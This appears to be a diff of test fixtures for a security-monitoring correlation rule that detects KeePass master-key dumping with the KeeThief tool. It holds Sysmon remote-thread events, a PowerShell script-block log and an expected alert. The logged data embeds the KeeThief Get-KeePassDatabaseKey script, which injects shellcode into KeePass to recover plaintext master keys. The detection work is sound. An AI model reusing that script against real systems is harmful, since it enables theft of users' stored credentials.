18:55:04.980\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a512-5cc4-0000-0010c05e1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"2856\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"1384\"},{\"Name\":\"StartAddress\",\"text\":\"0x06160000\"},{\"Name\":\"StartModule\"},{\"Name\":\"StartFunction\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x06160000", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.id": "1384", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T03:10:10.818Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-a512-5cc4-0000-0010c05e1b00", "subject.process.id": "2856", "subject.process.name": "powershell.exe", 
"subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:04.980Z", "type": "raw", "uuid": "d26cbfcd-61bb-4a46-83a3-3a1379d98dbc"}
+{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:04.7106082Z\"},\"EventRecordID\":\"7070\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 18:55:04.710\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a512-5cc4-0000-0010c05e1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"2856\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"3796\"},{\"Name\":\"StartAddress\",\"text\":\"0x76FAEC4B\"},{\"Name\":\"StartModule\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll\"},{\"Name\":\"StartFunction\",\"text\":\"DbgUiRemoteBreakin\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x76FAEC4B", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", 
"event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.fullpath": "c:\\windows\\system32\\ntdll.dll", "object.id": "3796", "object.name": "ntdll.dll", "object.path": "c:\\windows\\system32\\", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "object.property": "start function", "object.value": "DbgUiRemoteBreakin", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T03:10:10.818Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-a512-5cc4-0000-0010c05e1b00", "subject.process.id": "2856", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:04.710Z", "type": "raw", "uuid": "45f9b787-ef50-4e90-9a77-52c768689039"}
-expect 1 {"correlation_name": "Keepass_Key_Dump_Via_KeeThief"}
\ No newline at end of file
+expect 1 {"action": "extract", "alert.context": "getmethod('getkeepassmasterkeys').invoke", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores: Password Managers", "correlation_name": "Keepass_Key_Dump_Via_KeeThief", "correlation_type": 
"incident", "datafield6": "0x76FAEC4B", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Keepass_Key_Dump_Via_KeeThief|iewin7|c:\\program files\\keepass password safe 2\\keepass.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "numfield1": 1, "numfield2": 1, "object": "application", "object.fullpath": "c:\\windows\\system32\\ntdll.dll", "object.id": "3796", "object.name": "ntdll.dll", "object.path": "c:\\windows\\system32\\", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "object.property": "start function", "object.value": "DbgUiRemoteBreakin", "status": "success", "subject.account.id": "S-1-5-18", "subject.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "subject.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. 
If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... 
KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' 
} } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = 
$WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "subject.process.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "subject.process.id": "7064", "subject.process.name": "KeeThief.ps1", "subject.process.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\"}
\ No newline at end of file
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_2.sc
index 8e6c8392..49e9ac61 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_2.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_2.sc
@@ -2,4 +2,5 @@
 {"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:04.7106082Z\"},\"EventRecordID\":\"7070\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 18:55:04.710\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a512-5cc4-0000-0010c05e1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"2856\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"3796\"},{\"Name\":\"StartAddress\",\"text\":\"0x76FAEC4B\"},{\"Name\":\"StartModule\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll\"},{\"Name\":\"StartFunction\",\"text\":\"DbgUiRemoteBreakin\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x76FAEC4B", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", 
"importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.fullpath": "c:\\windows\\system32\\ntdll.dll", "object.id": "3796", "object.name": "ntdll.dll", "object.path": "c:\\windows\\system32\\", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "object.property": "start function", "object.value": "DbgUiRemoteBreakin", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T03:10:10.818Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-a512-5cc4-0000-0010c05e1b00", "subject.process.id": "2856", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:04.710Z", "type": "raw", "uuid": "45f9b787-ef50-4e90-9a77-52c768689039"}
 {"action": "execute", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:02.7106082Z\"},\"EventRecordID\":\"273644\",\"Correlation\":{\"ActivityID\":\"{83cf053f-9302-0000-d6c4-7b840293d901}\"},\"Execution\":{\"ProcessID\":\"7064\",\"ThreadID\":\"5708\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"1\",\"Name\":\"MessageNumber\"},{\"text\":\"1\",\"Name\":\"MessageTotal\"},{\"text\":\"# requires -version 2\\n\\nfunction Get-KeePassDatabaseKey {\\n<# \\n .SYNOPSIS\\n \\n Retrieves database mastey key information for unlocked KeePass database.\\n\\n Function: Get-KeePassDatabaseKey\\n Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y)\\n License: BSD 3-Clause\\n Required Dependencies: None\\n Optional Dependencies: None\\n\\n .DESCRIPTION\\n \\n Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline.\\n Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys()\\n method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate\\n all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted\\n from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey.\\n If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount)\\n is extracted, including the DPAPI encrypted data blobs of key data. 
For any encrypted blobs found, shellcode\\n is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs,\\n returning the plaintext/unprotected key data.\\n\\n .PARAMETER Process\\n\\n Optional KeePass process object to pass in on the pipeline.\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49045328\\n EncryptedBlob : {113, 148, 127, 29...}\\n EncryptedBlobLen : 64\\n PlaintextBlob : {120, 181, 162, 116...}\\n Plaintext : eLWidCSt...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpKeyFile\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49037240\\n EncryptedBlob : {137, 185, 6, 97...}\\n EncryptedBlobLen : 32\\n PlaintextBlob : {177, 5, 150, 205...}\\n Plaintext : sQWWzdcT...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Documents\\\\s.license\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpPassword\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 48920376\\n EncryptedBlob : {228, 78, 75, 16...}\\n EncryptedBlobLen : 16\\n PlaintextBlob : {80, 97, 115, 115...}\\n Plaintext : Password123!\\n KeyFilePath :\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-Process KeePass | 
Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n ....\\n# >\\n [CmdletBinding()] \\n param (\\n [Parameter(Position = 0, ValueFromPipeline = $True)]\\n [System.Diagnostics.Process[]]\\n [ValidateNotNullOrEmpty()]\\n $Process\\n )\\n \\n BEGIN {\\n if(-not $PSBoundParameters['Process']) {\\n try {\\n $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\\\.'}\\n }\\n catch {\\n throw 'No KeePass 2.X instances open!'\\n }\\n }\\n\\n # load file off of disk instead\\n # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\\\ReleaseKeePass.exe).FullName)\\n\\n # the KeyTheft assembly, generated with \\\"Out-CompressedDll -FilePath .\\\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\\\compressed.ps1\\\"\\n\\n }\\n\\n PROCESS {\\n\\n ForEach($KeePassProcess in $Process) {\\n\\n if($KeePassProcess.FileVersion -match '^2\\\\.') {\\n\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath\\n\\n Write-Verbose \\\"Examining KeePass process $($KeePassProcess.ID) for master keys\\\"\\n\\n $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess))\\n\\n if($Keys) {\\n\\n ForEach ($Key in $Keys) {\\n\\n ForEach($UserKey in $Key.UserKeys) {\\n\\n $KeyType = $UserKey.GetType().Name\\n\\n $UserKeyObject = New-Object PSObject\\n $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation\\n $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType\\n $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion\\n $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID\\n $UserKeyObject | Add-Member Noteproperty 
'ExecutablePath' $ExecutablePath\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen\\n $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob\\n\\n if($KeyType -eq 'KcpPassword') {\\n $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob)\\n }\\n else {\\n $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob)\\n }\\n\\n $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext\\n\\n if($KeyType -eq 'KcpUserAccount') {\\n try {\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $UserName = $WMIProcess.GetOwner().User\\n\\n $ProtectedUserKeyPath = Resolve-Path -Path \\\"$($Env:WinDir | Split-Path -Qualifier)\\\\Users\\\\*$UserName*\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\\n\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath\\n\\n }\\n catch {\\n Write-Warning \\\"Error enumerating the owner of $($KeePassProcess.ID) : $_\\\"\\n }\\n }\\n else {\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath\\n }\\n\\n $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys')\\n $UserKeyObject\\n }\\n }\\n }\\n else {\\n Write-Verbose \\\"No keys found for $($KeePassProcess.ID)\\\"\\n }\\n }\\n else {\\n Write-Warning \\\"Only KeePass 2.X is supported at this time.\\\"\\n }\\n }\\n }\\n}\\n\",\"Name\":\"ScriptBlockText\"},{\"text\":\"d4643a9b-6f64-4fbc-95e8-c2524689590f\",\"Name\":\"ScriptBlockId\"},{\"text\":\"C:\\\\Users\\\\Administrator\\\\Downloads\\\\KeeThief_test\\\\KeeThief-master\\\\KeeTheft\\\\KeeTheft\\\\KeeThief.ps1\",\"Name\":\"Path\"}]}}}", "category.generic": "Command", "category.high": "System 
Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-18", "object.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "object.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "object.name": "KeeThief.ps1", "object.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\", "object.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. 
If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe 